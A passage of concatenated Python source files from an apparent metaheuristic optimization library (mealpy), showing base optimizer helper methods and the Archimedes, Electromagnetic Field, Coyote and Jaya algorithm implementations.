def update_fitness_population(self, pop=None):
"""
Args:
mode (str): processing mode, it can be "sequential", "thread" or "process"
pop (list): the population
Returns:
population: with updated fitness value
"""
if self.mode == "thread":
with parallel.ThreadPoolExecutor() as executor:
list_results = executor.map(self.get_fitness_solution, pop) # Return result not the future object
for idx, fit in enumerate(list_results):
pop[idx][self.ID_FIT] = fit
elif self.mode == "process":
with parallel.ProcessPoolExecutor() as executor:
list_results = executor.map(self.get_fitness_solution, pop) # Return result not the future object
for idx, fit in enumerate(list_results):
pop[idx][self.ID_FIT] = fit
else:
for idx, agent in enumerate(pop):
pop[idx][self.ID_FIT] = self.get_fitness_solution(agent)
return pop
def get_fitness_position(self, position=None):
"""
Args:
position (nd.array): 1-D numpy array
Returns:
[target, [obj1, obj2, ...]]
"""
objs = self.problem.obj_func(position)
if not self.problem.obj_is_list:
objs = [objs]
fit = np.dot(objs, self.problem.obj_weight)
return [fit, objs]
def get_fitness_solution(self, solution=None):
"""
Args:
solution (list): A solution with format [position, [target, [obj1, obj2, ...]]]
Returns:
[target, [obj1, obj2, ...]]
"""
return self.get_fitness_position(solution[self.ID_POS])
def get_global_best_solution(self, pop: list):
"""
Sort population and return the sorted population and the best solution
Args:
pop (list): The population of pop_size individuals
Returns:
Sorted population and global best solution
"""
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR]) # Already returned a new sorted list
if self.problem.minmax == "min":
return sorted_pop, deepcopy(sorted_pop[0])
else:
return sorted_pop, deepcopy(sorted_pop[-1])
def get_better_solution(self, agent1: list, agent2: list):
"""
Args:
agent1 (list): A solution
agent2 (list): Another solution
Returns:
The better solution between them
"""
if self.problem.minmax == "min":
if agent1[self.ID_FIT][self.ID_TAR] < agent2[self.ID_FIT][self.ID_TAR]:
return deepcopy(agent1)
return deepcopy(agent2)
else:
if agent1[self.ID_FIT][self.ID_TAR] < agent2[self.ID_FIT][self.ID_TAR]:
return deepcopy(agent2)
return deepcopy(agent1)
def compare_agent(self, agent_a: list, agent_b: list):
"""
Args:
agent_a (list): Solution a
agent_b (list): Solution b
Returns:
boolean: Return True if solution a better than solution b and otherwise
"""
if self.problem.minmax == "min":
if agent_a[self.ID_FIT][self.ID_TAR] < agent_b[self.ID_FIT][self.ID_TAR]:
return True
return False
else:
if agent_a[self.ID_FIT][self.ID_TAR] < agent_b[self.ID_FIT][self.ID_TAR]:
return False
return True
def get_special_solutions(self, pop=None, best=3, worst=3):
"""
Args:
pop (list): The population
best (int): Top k1 best solutions, default k1=3, it can be None
worst (int): Top k2 worst solutions, default k2=3, it can be None
Returns:
sorted_population, k1 best solutions and k2 worst solutions
"""
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
if best is None:
if worst is None:
exit(0)
else:
return pop, None, deepcopy(pop[:-worst])
else:
if worst is None:
return pop, deepcopy(pop[:best]), None
else:
return pop, deepcopy(pop[:best]), deepcopy(pop[:-worst])
def get_special_fitness(self, pop=None):
"""
Args:
pop (list): The population
Returns:
Total fitness, best fitness, worst fitness
"""
total_fitness = np.sum([agent[self.ID_FIT][self.ID_TAR] for agent in pop])
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
return total_fitness, pop[0][self.ID_FIT][self.ID_TAR], pop[-1][self.ID_FIT][self.ID_TAR]
def update_global_best_solution(self, pop=None, save=True):
"""
Update the global best solution saved in variable named: self.history_list_g_best
Args:
pop (list): The population of pop_size individuals
save (bool): True if you want to add new current global best and False if you just want update the current one.
Returns:
Sorted population and the global best solution
"""
if self.problem.minmax == "min":
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
else:
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=True)
current_best = sorted_pop[0]
# self.history_list_c_best.append(current_best)
# better = self.get_better_solution(current_best, self.history_list_g_best[-1])
# self.history_list_g_best.append(better)
if save:
self.history.list_current_best.append(current_best)
better = self.get_better_solution(current_best, self.history.list_global_best[-1])
self.history.list_global_best.append(better)
return deepcopy(sorted_pop), deepcopy(better)
else:
local_better = self.get_better_solution(current_best, self.history.list_current_best[-1])
self.history.list_current_best[-1] = local_better
global_better = self.get_better_solution(current_best, self.history.list_global_best[-1])
self.history.list_global_best[-1] = global_better
return deepcopy(sorted_pop), deepcopy(global_better)
def print_epoch(self, epoch, runtime):
"""
Print out the detailed information of training process
Args:
epoch (int): current iteration
runtime (float): the runtime for current iteration
"""
if self.verbose:
print(f"> Epoch: {epoch}, Current best: {self.history.list_current_best[-1][self.ID_FIT][self.ID_TAR]}, "
f"Global best: {self.history.list_global_best[-1][self.ID_FIT][self.ID_TAR]}, Runtime: {runtime:.5f} seconds")
def save_optimization_process(self):
"""
Detail: Save important data for later use such as:
+ history_list_g_best_fit
+ history_list_c_best_fit
+ history_list_div
+ history_list_explore
+ history_list_exploit
"""
# self.history_list_g_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history_list_g_best]
# self.history_list_c_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history_list_c_best]
#
# # Draw the exploration and exploitation line with this data
# self.history_list_div = np.ones(self.epoch)
# for idx, pop in enumerate(self.history_list_pop):
# pos_matrix = np.array([agent[self.ID_POS] for agent in pop])
# div = np.mean(abs((np.median(pos_matrix, axis=0) - pos_matrix)), axis=0)
# self.history_list_div[idx] = np.mean(div, axis=0)
# div_max = np.max(self.history_list_div)
# self.history_list_explore = 100 * (self.history_list_div / div_max)
# self.history_list_exploit = 100 - self.history_list_explore
self.history.epoch = len(self.history.list_global_best)
self.history.list_global_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history.list_global_best]
self.history.list_current_best_fit = [agent[self.ID_FIT][self.ID_TAR] for agent in self.history.list_current_best]
# Draw the exploration and exploitation line with this data
self.history.list_diversity = np.ones(self.history.epoch)
for idx, pop in enumerate(self.history.list_population):
pos_matrix = np.array([agent[self.ID_POS] for agent in pop])
div = np.mean(abs((np.median(pos_matrix, axis=0) - pos_matrix)), axis=0)
self.history.list_diversity[idx] = np.mean(div, axis=0)
div_max = np.max(self.history.list_diversity)
self.history.list_exploration = 100 * (self.history.list_diversity / div_max)
self.history.list_exploitation = 100 - self.history.list_exploration
self.solution = self.history.list_global_best[-1]
## Crossover techniques
def get_index_roulette_wheel_selection(self, list_fitness: np.array):
"""
This method can handle min/max problem, and negative or positive fitness value.
Args:
list_fitness (nd.array): 1-D numpy array
Returns:
Index of selected solution
"""
scaled_fitness = (list_fitness - np.min(list_fitness)) / (np.ptp(list_fitness) + self.EPSILON)
if self.problem.minmax == "min":
final_fitness = 1.0 - scaled_fitness
else:
final_fitness = scaled_fitness
total_sum = sum(final_fitness)
r = np.random.uniform(low=0, high=total_sum)
for idx, f in enumerate(final_fitness):
r = r + f
if r > total_sum:
return idx
return np.random.choice(range(0, len(list_fitness)))
def get_solution_kway_tournament_selection(self, pop: list, k_way=0.2, output=2):
if 0 < k_way < 1:
k_way = int(k_way * len(pop))
k_way = round(k_way)
list_id = np.random.choice(range(len(pop)), k_way, replace=False)
list_parents = [pop[i] for i in list_id]
list_parents = sorted(list_parents, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
if self.problem.minmax == "min":
return list_parents[:output]
else:
return list_parents[-output:]
def get_levy_flight_step(self, beta=1.0, multiplier=0.001, case=0):
"""
Parameters
----------
multiplier (float, optional): 0.01
beta: [0-2]
+ 0-1: small range --> exploit
+ 1-2: large range --> explore
case: 0, 1, -1
+ 0: return multiplier * s * np.random.uniform()
+ 1: return multiplier * s * np.random.normal(0, 1)
+ -1: return multiplier * s
"""
# u and v are two random variables which follow np.random.normal distribution
# sigma_u : standard deviation of u
sigma_u = np.power(gamma(1 + beta) * np.sin(np.pi * beta / 2) / (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2)), 1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
u = np.random.normal(0, sigma_u ** 2)
v = np.random.normal(0, sigma_v ** 2)
s = u / np.power(abs(v), 1 / beta)
if case == 0:
step = multiplier * s * np.random.uniform()
elif case == 1:
step = multiplier * s * np.random.normal(0, 1)
else:
step = multiplier * s
return step
def levy_flight(self, epoch=None, position=None, g_best_position=None, step=0.001, case=0):
"""
Parameters
----------
epoch (int): current iteration
position : 1-D numpy np.array
g_best_position : 1-D numpy np.array
step (float, optional): 0.001
case (int, optional): 0, 1, 2
"""
beta = 1
# muy and v are two random variables which follow np.random.normal distribution
# sigma_muy : standard deviation of muy
sigma_muy = np.power(gamma(1 + beta) * np.sin(np.pi * beta / 2) / (gamma((1 + beta) / 2) * beta * np.power(2, (beta - 1) / 2)), 1 / beta)
# sigma_v : standard deviation of v
sigma_v = 1
muy = np.random.normal(0, sigma_muy ** 2)
v = np.random.normal(0, sigma_v ** 2)
s = muy / np.power(abs(v), 1 / beta)
levy = np.random.uniform(self.problem.lb, self.problem.ub) * step * s * (position - g_best_position)
if case == 0:
return levy
elif case == 1:
return position + 1.0 / np.sqrt(epoch + 1) * np.sign(np.random.random() - 0.5) * levy
elif case == 2:
return position + np.random.normal(0, 1, len(self.problem.lb)) * levy
elif case == 3:
return position + 0.01 * levy
def amend_position(self, position=None):
"""
Args:
position (): vector position (location) of the solution.
Returns:
Amended position (make the position is in bound)
"""
return np.maximum(self.problem.lb, np.minimum(self.problem.ub, position))
def amend_position_faster(self, position=None):
"""
This is method is faster than "amend_position" in most cases.
Args:
position (): vector position (location) of the solution.
Returns:
Amended position
"""
return np.clip(position, self.problem.lb, self.problem.ub)
def amend_position_random(self, position=None):
"""
If solution out of bound at dimension x, then it will re-arrange to random location in the range of domain
Args:
position (): vector position (location) of the solution.
Returns:
Amended position
"""
return np.where(np.logical_and(self.problem.lb <= position, position <= self.problem.ub),
position, np.random.uniform(self.problem.lb, self.problem.ub))
def get_global_best_global_worst_solution(self, pop=None):
"""
Args:
pop (): The population
Returns:
The global best and the global worst solution
"""
# Already returned a new sorted list
sorted_pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR])
if self.problem.minmax == "min":
return deepcopy(sorted_pop[0]), deepcopy(sorted_pop[-1])
else:
return deepcopy(sorted_pop[-1]), deepcopy(sorted_pop[0])
### Survivor Selection
def greedy_selection_population(self, pop_old=None, pop_new=None):
"""
Args:
pop_old (): The current population
pop_new (): The next population
Returns:
The new population with better solutions
"""
len_old, len_new = len(pop_old), len(pop_new)
if len_old != len_new:
print("Pop old and Pop new should be the same length!")
exit(0)
if self.problem.minmax == "min":
return [pop_new[i] if pop_new[i][self.ID_FIT][self.ID_TAR] < pop_old[i][self.ID_FIT][self.ID_TAR]
else pop_old[i] for i in range(len_old)]
else:
return [pop_new[i] if pop_new[i][self.ID_FIT] > pop_old[i][self.ID_FIT]
else pop_old[i] for i in range(len_old)]
def get_sorted_strim_population(self, pop=None, pop_size=None, reverse=False):
"""
Args:
pop (list): The population
pop_size (int): The number of population
Returns:
The sorted population with pop_size size
"""
if self.problem.minmax == "min":
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=reverse)
else:
pop = sorted(pop, key=lambda agent: agent[self.ID_FIT][self.ID_TAR], reverse=reverse)
return pop[:pop_size]
def create_opposition_position(self, agent=None, g_best=None):
"""
Args:
agent (): The current agent
g_best (): the global best solution
Returns:
The opposite solution
"""
return self.problem.lb + self.problem.ub - g_best[self.ID_POS] + np.random.uniform() * (g_best[self.ID_POS] - agent[self.ID_POS])
def get_parent_kway_tournament_selection(self, pop=None, k_way=0.2, output=2):
if 0 < k_way < 1:
k_way = int(k_way * len(pop))
list_id = np.random.choice(range(len(pop)), k_way, replace=False)
list_parents = [pop[i] for i in list_id]
list_parents = sorted(list_parents, key=lambda temp: temp[self.ID_FIT])
return list_parents[:output]
### Crossover
def crossover_arthmetic_recombination(self, dad_pos=None, mom_pos=None):
r = np.random.uniform() # w1 = w2 when r =0.5
w1 = np.multiply(r, dad_pos) + np.multiply((1 - r), mom_pos)
w2 = np.multiply(r, mom_pos) + np.multiply((1 - r), dad_pos)
return w1, w2
#### Improved techniques can be used in any algorithms: 1
## Based on this paper: An efficient equilibrium optimizer with mutation strategy for numerical optimization (but still different)
## This scheme used after the original and including 4 step:
## s1: sort population, take p1 = 1/2 best population for next round
## s2: do the mutation for p1, using greedy method to select the better solution
## s3: do the search mechanism for p1 (based on global best solution and the updated p1 above), to make p2 population
## s4: construct the new population for next generation
def improved_ms(self, pop=None, g_best=None): ## m: mutation, s: search
pop_len = int(len(pop) / 2)
## Sort the updated population based on fitness
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
pop_s1, pop_s2 = pop[:pop_len], pop[pop_len:]
## Mutation scheme
pop_new = []
for i in range(0, pop_len):
agent = deepcopy(pop_s1[i])
pos_new = pop_s1[i][self.ID_POS] * (1 + np.random.normal(0, 1, self.problem.n_dims))
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
pop_s1 = self.greedy_selection_population(pop_s1, pop_new) ## Greedy method --> improved exploitation
## Search Mechanism
pos_s1_list = [item[self.ID_POS] for item in pop_s1]
pos_s1_mean = np.mean(pos_s1_list, axis=0)
pop_new = []
for i in range(0, pop_len):
agent = deepcopy(pop_s2[i])
pos_new = (g_best[self.ID_POS] - pos_s1_mean) - np.random.random() * \
(self.problem.lb + np.random.random() * (self.problem.ub - self.problem.lb))
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
## Keep the diversity of populatoin and still improved the exploration
pop_s2 = self.update_fitness_population(pop_new)
pop_s2 = self.greedy_selection_population(pop_s2, pop_new)
## Construct a new population
pop = pop_s1 + pop_s2
return pop
```
#### File: mealpy/physics_based/ArchOA.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class OriginalArchOA(Optimizer):
"""
The original version of: Archimedes Optimization Algorithm (ArchOA)
(Archimedes optimization algorithm: a new metaheuristic algorithm for solving optimization problems)
Link:
https://doi.org/10.1007/s10489-020-01893-z
"""
ID_POS = 0
ID_FIT = 1
ID_DEN = 2 # Density
ID_VOL = 3 # Volume
ID_ACC = 4 # Acceleration
def __init__(self, problem, epoch=10000, pop_size=100, c1=2, c2=6, c3=2, c4=0.5, acc_upper=0.9, acc_lower=0.1, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
c1 (int): Default belongs [1, 2]
c2 (int): Default belongs [2, 4, 6]
c3 (int): Default belongs [1, 2]
c4 (float): Default belongs [0.5, 1]
acc_upper (float): Default 0.9
acc_lower (float): Default 0.1
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.c1 = c1
self.c2 = c2
self.c3 = c3
self.c4 = c4
self.acc_upper = acc_upper
self.acc_lower = acc_lower
def create_solution(self):
"""
Returns:
The position position with 2 element: index of position/location and index of fitness wrapper
The general format: [position, [target, [obj1, obj2, ...]], density, volume, acceleration]
## To get the position, fitness wrapper, target and obj list
## A[self.ID_POS] --> Return: position
## A[self.ID_FIT] --> Return: [target, [obj1, obj2, ...]]
## A[self.ID_FIT][self.ID_TAR] --> Return: target
## A[self.ID_FIT][self.ID_OBJ] --> Return: [obj1, obj2, ...]
"""
position = np.random.uniform(self.problem.lb, self.problem.ub)
fitness = self.get_fitness_position(position=position)
den = np.random.uniform(self.problem.lb, self.problem.ub)
vol = np.random.uniform(self.problem.lb, self.problem.ub)
acc = self.problem.lb + np.random.uniform(self.problem.lb, self.problem.ub) * (self.problem.ub - self.problem.lb)
return [position, fitness, den, vol, acc]
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
## Transfer operator Eq. 8
tf = np.exp((epoch + 1) / self.epoch - 1)
## Density decreasing factor Eq. 9
ddf = np.exp(1 - (epoch + 1) / self.epoch) - (epoch + 1) / self.epoch
list_acc = []
## Calculate new density, volume and acceleration
for i in range(0, self.pop_size):
# Update density and volume of each object using Eq. 7
new_den = self.pop[i][self.ID_DEN] + np.random.uniform() * (self.g_best[self.ID_DEN] - self.pop[i][self.ID_DEN])
new_vol = self.pop[i][self.ID_VOL] + np.random.uniform() * (self.g_best[self.ID_VOL] - self.pop[i][self.ID_VOL])
# Exploration phase
if tf <= 0.5:
# Update acceleration using Eq. 10 and normalize acceleration using Eq. 12
id_rand = np.random.choice(list(set(range(0, self.pop_size)) - {i}))
new_acc = (self.pop[id_rand][self.ID_DEN] + self.pop[id_rand][self.ID_VOL] * self.pop[id_rand][self.ID_ACC]) / (new_den * new_vol)
else:
new_acc = (self.g_best[self.ID_DEN] + self.g_best[self.ID_VOL] * self.g_best[self.ID_ACC]) / (new_den * new_vol)
list_acc.append(new_acc)
self.pop[i][self.ID_DEN] = new_den
self.pop[i][self.ID_VOL] = new_vol
min_acc = np.min(list_acc)
max_acc = np.max(list_acc)
## Normalize acceleration using Eq. 12
for i in range(0, self.pop_size):
self.pop[i][self.ID_ACC] = self.acc_upper * (self.pop[i][self.ID_ACC] - min_acc) / (max_acc - min_acc) + self.acc_lower
pop_new = []
for idx in range(0, self.pop_size):
solution = deepcopy(self.pop[idx])
if tf <= 0.5: # update position using Eq. 13
id_rand = np.random.choice(list(set(range(0, self.pop_size)) - {idx}))
pos_new = self.pop[idx][self.ID_POS] + self.c1 * np.random.uniform() * \
self.pop[idx][self.ID_ACC] * ddf * (self.pop[id_rand][self.ID_POS] - self.pop[idx][self.ID_POS])
else:
p = 2 * np.random.rand() - self.c4
f = 1 if p <= 0.5 else -1
t = self.c3 * tf
pos_new = self.g_best[self.ID_POS] + f * self.c2 * np.random.rand() * self.pop[idx][self.ID_ACC] * \
ddf * (t * self.g_best[self.ID_POS] - self.pop[idx][self.ID_POS])
solution[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(solution)
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
```
#### File: mealpy/physics_based/EFO.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseEFO(Optimizer):
"""
My version of : Electromagnetic Field Optimization (EFO)
(Electromagnetic field optimization: A physics-inspired metaheuristic optimization algorithm)
Link:
https://www.sciencedirect.com/science/article/abs/pii/S2210650215000528
Notes:
+ The flow of algorithm is changed like other metaheuristics.
+ Change equations using g_best solution
"""
def __init__(self, problem, epoch=10000, pop_size=100, r_rate=0.3, ps_rate=0.85, p_field=0.1, n_field=0.45, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_rate (): default = 0.3 Like mutation parameter in GA but for one variable
ps_rate (): default = 0.85 Like crossover parameter in GA
p_field (): default = 0.1 portion of population, positive field
n_field (): default = 0.45 portion of population, negative field
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
self.epoch = epoch
self.pop_size = pop_size
self.r_rate = r_rate
self.ps_rate = ps_rate
self.p_field = p_field
self.n_field = n_field
self.phi = (1 + np.sqrt(5)) / 2 # golden ratio
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
pop_new = []
for idx in range(0, self.pop_size):
r_idx1 = np.random.randint(0, int(self.pop_size * self.p_field)) # top
r_idx2 = np.random.randint(int(self.pop_size * (1 - self.n_field)), self.pop_size) # bottom
r_idx3 = np.random.randint(int((self.pop_size * self.p_field) + 1), int(self.pop_size * (1 - self.n_field))) # middle
if np.random.uniform() < self.ps_rate:
# new = g_best + phi* r1 * (top - middle) + r2 (top - bottom)
# pos_new = g_best[self.ID_POS] + \
# phi * np.random.uniform() * (pop[r_idx1][self.ID_POS] - pop[r_idx3][self.ID_POS]) + \
# np.random.uniform() * (pop[r_idx1][self.ID_POS] - pop[r_idx2][self.ID_POS])
# new = top + phi * r1 * (g_best - bottom) + r2 * (g_best - middle)
pos_new = self.pop[r_idx1][self.ID_POS] + self.phi * np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[r_idx3][self.ID_POS]) \
+ np.random.uniform() * (self.g_best[self.ID_POS] - self.pop[r_idx2][self.ID_POS])
else:
# new = top
# pos_new = self.levy_flight(epoch + 1, self.pop[idx][self.ID_POS], self.g_best[self.ID_POS])
pos_new = np.random.uniform(self.problem.lb, self.problem.ub)
# replacement of one electromagnet of generated particle with a random number
# (only for some generated particles) to bring diversity to the population
if np.random.uniform() < self.r_rate:
RI = np.random.randint(0, self.problem.n_dims)
pos_new[np.random.randint(0, self.problem.n_dims)] = np.random.uniform(self.problem.lb[RI], self.problem.ub[RI])
# checking whether the generated number is inside boundary or not
pos_new = self.amend_position_random(pos_new)
pop_new.append([pos_new, None])
pop_new = self.update_fitness_population(pop_new)
self.pop = self.greedy_selection_population(self.pop, pop_new)
class OriginalEFO(BaseEFO):
"""
The original version of : Electromagnetic Field Optimization (EFO)
(Electromagnetic field optimization: A physics-inspired metaheuristic optimization algorithm)
Link:
https://www.mathworks.com/matlabcentral/fileexchange/52744-electromagnetic-field-optimization-a-physics-inspired-metaheuristic-optimization-algorithm
https://www.mathworks.com/matlabcentral/fileexchange/73352-equilibrium-optimizer-eo
"""
def __init__(self, problem, epoch=10000, pop_size=100, r_rate=0.3, ps_rate=0.85, p_field=0.1, n_field=0.45, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
r_rate (): default = 0.3 Like mutation parameter in GA but for one variable
ps_rate (): default = 0.85 Like crossover parameter in GA
p_field (): default = 0.1 portion of population, positive field
n_field (): default = 0.45 portion of population, negative field
**kwargs ():
"""
super().__init__(problem, epoch, pop_size, r_rate, ps_rate, p_field, n_field, **kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = True
def initialization(self):
pop = self.create_population(self.pop_size)
self.pop, self.g_best = self.get_global_best_solution(pop)
# %random vectors (this is to increase the calculation speed instead of determining the random values in each
# iteration we allocate them in the beginning before algorithm start
self.r_index1 = np.random.randint(0, int(self.pop_size * self.p_field), (self.problem.n_dims, self.epoch))
# random particles from positive field
self.r_index2 = np.random.randint(int(self.pop_size * (1 - self.n_field)), self.pop_size, (self.problem.n_dims, self.epoch))
# random particles from negative field
self.r_index3 = np.random.randint(int((self.pop_size * self.p_field) + 1), int(self.pop_size * (1 - self.n_field)), (self.problem.n_dims, self.epoch))
# random particles from neutral field
self.ps = np.random.uniform(0, 1, (self.problem.n_dims, self.epoch))
# Probability of selecting electromagnets of generated particle from the positive field
self.r_force = np.random.uniform(0, 1, self.epoch)
# random force in each generation
self.rp = np.random.uniform(0, 1, self.epoch)
# Some random numbers for checking randomness probability in each generation
self.randomization = np.random.uniform(0, 1, self.epoch)
# Coefficient of randomization when generated electro magnet is out of boundary
self.RI = 0
# index of the electromagnet (variable) which is going to be initialized by random number
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
r = self.r_force[epoch]
x_new = np.zeros(self.problem.n_dims) # temporary array to store generated particle
for i in range(0, self.problem.n_dims):
if self.ps[i, epoch] > self.ps_rate:
x_new[i] = self.pop[self.r_index3[i, epoch]][self.ID_POS][i] + \
self.phi * r * (self.pop[self.r_index1[i, epoch]][self.ID_POS][i] - self.pop[self.r_index3[i, epoch]][self.ID_POS][i]) + \
r * (self.pop[self.r_index3[i, epoch]][self.ID_POS][i] - self.pop[self.r_index2[i, epoch]][self.ID_POS][i])
else:
x_new[i] = self.pop[self.r_index1[i, epoch]][self.ID_POS][i]
# replacement of one electromagnet of generated particle with a random number (only for some generated particles) to bring diversity to the population
if self.rp[epoch] < self.r_rate:
x_new[self.RI] = self.problem.lb[self.RI] + (self.problem.ub[self.RI] - self.problem.lb[self.RI]) * self.randomization[epoch]
RI = self.RI + 1
if RI >= self.problem.n_dims:
self.RI = 0
# checking whether the generated number is inside boundary or not
pos_new = self.amend_position_random(x_new)
fit_new = self.get_fitness_position(pos_new)
# Updating the population if the fitness of the generated particle is better than worst fitness in
# the population (because the population is sorted by fitness, the last particle is the worst)
self.pop[-1] = [pos_new, fit_new]
```
#### File: mealpy/swarm_based/COA.py
```python
import numpy as np
from copy import deepcopy
from mealpy.optimizer import Optimizer
class BaseCOA(Optimizer):
"""
The original version of: Coyote Optimization Algorithm (COA)
(Coyote Optimization Algorithm: A new metaheuristic for global optimization problems)
Link:
https://ieeexplore.ieee.org/document/8477769
Old version (Mealpy < 1.2.2) use this Ref code: https://github.com/jkpir/COA/blob/master/COA.py
"""
ID_AGE = 2
def __init__(self, problem, epoch=10000, pop_size=100, n_coyotes=5, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
n_coyotes (int): number of coyotes per group
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size + 1
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
self.n_coyotes = n_coyotes
self.n_packs = int(pop_size/self.n_coyotes)
self.ps = 1 / self.problem.n_dims
self.p_leave = 0.005 * (self.n_coyotes**2) # Probability of leaving a pack
def create_solution(self):
pos = np.random.uniform(self.problem.lb, self.problem.ub)
fit = self.get_fitness_position(pos)
age = 1
return [pos, fit, age]
def _create_pop_group(self, pop):
pop_group = []
for i in range(0, self.n_packs):
group = pop[i*self.n_coyotes:(i+1)*self.n_coyotes]
pop_group.append(group)
return pop_group
def initialization(self):
self.pop = self.create_population(self.pop_size)
self.pop_group = self._create_pop_group(self.pop)
_, self.g_best = self.get_global_best_solution(self.pop)
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
# Execute the operations inside each pack
for p in range(self.n_packs):
# Get the coyotes that belong to each pack
self.pop_group[p], local_best = self.get_global_best_solution(self.pop_group[p])
# Detect alphas according to the costs (Eq. 5)
# Compute the social tendency of the pack (Eq. 6)
tendency = np.mean([agent[self.ID_POS] for agent in self.pop_group[p]])
# Update coyotes' social condition
pop_new = []
for i in range(self.n_coyotes):
rc1, rc2 = np.random.choice(list(set(range(0, self.n_coyotes)) - {i}), 2, replace=False)
# Try to update the social condition according to the alpha and the pack tendency(Eq. 12)
pos_new = self.pop_group[p][i][self.ID_POS] + np.random.rand() * \
(self.pop_group[p][0][self.ID_POS] - self.pop_group[p][rc1][self.ID_POS]) + \
np.random.rand() * (tendency - self.pop_group[p][rc2][self.ID_POS])
# Keep the coyotes in the search space (optimization problem constraint)
pos_new = self.amend_position_faster(pos_new)
pop_new.append([pos_new, None, self.pop_group[p][i][self.ID_AGE]])
# Evaluate the new social condition (Eq. 13)
pop_new = self.update_fitness_population(pop_new)
# Adaptation (Eq. 14)
self.pop_group[p] = self.greedy_selection_population(self.pop_group[p], pop_new)
# Birth of a new coyote from random parents (Eq. 7 and Alg. 1)
id_dad, id_mom = np.random.choice(list(range(0, self.n_coyotes)), 2, replace=False)
prob1 = (1 - self.ps) / 2
# Generate the pup considering intrinsic and extrinsic influence
pup = np.where(np.random.uniform(0, 1, self.problem.n_dims) < prob1,
self.pop_group[p][id_dad][self.ID_POS], self.pop_group[p][id_mom][self.ID_POS])
# Eventual noise
pos_new = np.random.normal(0, 1) * pup
pos_new = self.amend_position_faster(pos_new)
fit_new = self.get_fitness_position(pos_new)
# Verify if the pup will survive
packs, local_best = self.get_global_best_solution(self.pop_group[p])
# Find index of element has fitness larger than new child
# If existed a element like that, new child is good
if self.compare_agent([pos_new, fit_new], packs[-1]):
packs = sorted(packs, key=lambda agent: agent[self.ID_AGE])
# Replace worst element by new child
# New born child with age = 0
packs[-1] = [pos_new, fit_new, 0]
self.pop_group[p] = deepcopy(packs)
# A coyote can leave a pack and enter in another pack (Eq. 4)
if self.n_packs > 1:
if np.random.rand() < self.p_leave:
id_pack1, id_pack2 = np.random.choice(list(range(0, self.n_packs)), 2, replace=False)
id1, id2 = np.random.choice(list(range(0, self.n_coyotes)), 2, replace=False)
self.pop_group[id_pack1][id1], self.pop_group[id_pack2][id2] = self.pop_group[id_pack2][id2], self.pop_group[id_pack1][id1]
# Update coyotes ages
for id_pack in range(0, self.n_packs):
for id_coy in range(0, self.n_coyotes):
self.pop_group[id_pack][id_coy][self.ID_AGE] += 1
self.pop = [agent for pack in self.pop_group for agent in pack]
```
#### File: mealpy/swarm_based/JA.py
```python
import numpy as np
from mealpy.optimizer import Optimizer
class BaseJA(Optimizer):
"""
My original version of: Jaya Algorithm (JA)
(A simple and new optimization algorithm for solving constrained and unconstrained optimization problems)
Link:
https://www.researchgate.net/publication/282532308_Jaya_A_simple_and_new_optimization_algorithm_for_solving_constrained_and_unconstrained_optimization_problems
Notes:
+ Remove all third loop in algorithm
+ Change the second random variable r2 to Gaussian instead of np.random.uniform
"""
def __init__(self, problem, epoch=10000, pop_size=100, **kwargs):
"""
Args:
problem ():
epoch (int): maximum number of iterations, default = 10000
pop_size (int): number of population size, default = 100
**kwargs ():
"""
super().__init__(problem, kwargs)
self.nfe_per_epoch = pop_size
self.sort_flag = False
self.epoch = epoch
self.pop_size = pop_size
def evolve(self, epoch):
"""
Args:
epoch (int): The current iteration
"""
_, best, worst = self.get_special_solutions(self.pop, best=1, worst=1)
g_best, g_worst = best[0], worst[0]
pop_new = []
for idx in range(0, self.pop_size):
pos_new = self.pop[idx][self.ID_POS] + np.random.uniform() * (g_best[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS])) + \
np.random.normal() * (g_worst[self.ID_POS] - np.abs(self.pop[idx][self.ID_POS]))
